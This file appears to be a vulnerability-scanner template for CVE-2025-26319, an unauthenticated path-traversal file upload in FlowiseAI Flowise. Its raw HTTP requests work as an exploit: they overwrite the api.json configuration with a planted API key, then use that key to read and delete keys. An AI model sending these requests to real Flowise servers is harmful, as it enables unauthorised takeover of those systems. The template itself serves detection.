id: CVE-2025-26319

info:
  name: FlowiseAI Flowise <= 2.2.6 - Arbitrary File Upload
  author: iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    FlowiseAI Flowise version 2.2.6 and below contains an arbitrary file upload vulnerability in the /api/v1/attachments endpoint. This vulnerability allows an unauthenticated attacker to upload files outside the intended directory through path traversal, potentially leading to API key exposure and remote code execution. The vulnerability can be exploited by uploading a malicious file to overwrite the .flowise/api.json configuration file.
  impact: |
    Unauthenticated attackers can exploit path traversal in file uploads to overwrite the api.json configuration file, potentially exposing API keys and achieving remote code execution.
  remediation: |
    Upgrade to FlowiseAI Flowise version 2.2.7 or later that properly validates file upload paths.
  reference:
    - https://github.com/advisories/GHSA-69jq-qr7w-j7qh
    - https://github.com/FlowiseAI/Flowise
    - https://nvd.nist.gov/vuln/detail/CVE-2025-26319
  classification:
    epss-score: 0.8771
    epss-percentile: 0.99489
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10.0
    cve-id: CVE-2025-26319
    cwe-id: CWE-434
  metadata:
    verified: true
    max-request: 3
    vendor: FlowiseAI
    product: Flowise
    shodan-query: title:"Flowise"
    fofa-query: title="Flowise"
  tags: cve,cve2025,flowise,fileupload,intrusive,vkev,vuln,ai

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /api/v1/attachments/..%2f..%2f..%2f..%2f..%2froot%2f/.flowise HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydTh0yj8zypRgPT1w

        ------WebKitFormBoundarydTh0yj8zypRgPT1w
        Content-Disposition: form-data; name="files";filename="api.json"
        Content-type: text/plain

        [{
        "keyName":"=",
        "apiKey":"24NHxsKIZi7Ee34rl7FtW3dtW1IuYjFQDegXP_Bn8yQ",
        "apiSecret":"8648f55db62716a6577b565efb66145b9ad8c50884c57ae8d4f03c4cd8b3ee27b1f77804d320f08bac8aa4b0dbf58a39dacbb767eb05efe1e57d5c66e5d48473.af4b3f229bd11ac5",
        "createdAt":"111",
        "id":"1111"
        }]
        ------WebKitFormBoundarydTh0yj8zypRgPT1w--

    matchers:
      - type: word
        part: body
        words:
          - 'name":'
          - 'mimeType":"text/plain'
        condition: and
        internal: true

  - raw:
      - |
        GET /api/v1/apikey HTTP/1.1
        Host: {{Hostname}}
        Authorization: Bearer 24NHxsKIZi7Ee34rl7FtW3dtW1IuYjFQDegXP_Bn8yQ

      - |
        DELETE /api/v1/apikey/1111 HTTP/1.1
        Host: {{Hostname}}
        Authorization: Bearer 24NHxsKIZi7Ee34rl7FtW3dtW1IuYjFQDegXP_Bn8yQ

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'apiKey":"'
          - 'apiSecret":'
          - 'chatFlows'
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022074b733ba7ad40cb1fd74f5b46c8555cc9f736ec41d27c09988ad739038e5bf81022100bdfda30dfce5700840ebf2168621e3d751cfda9c8f01018b556ddcae51a3077f:922c64590222798bb761d5b6d8e72950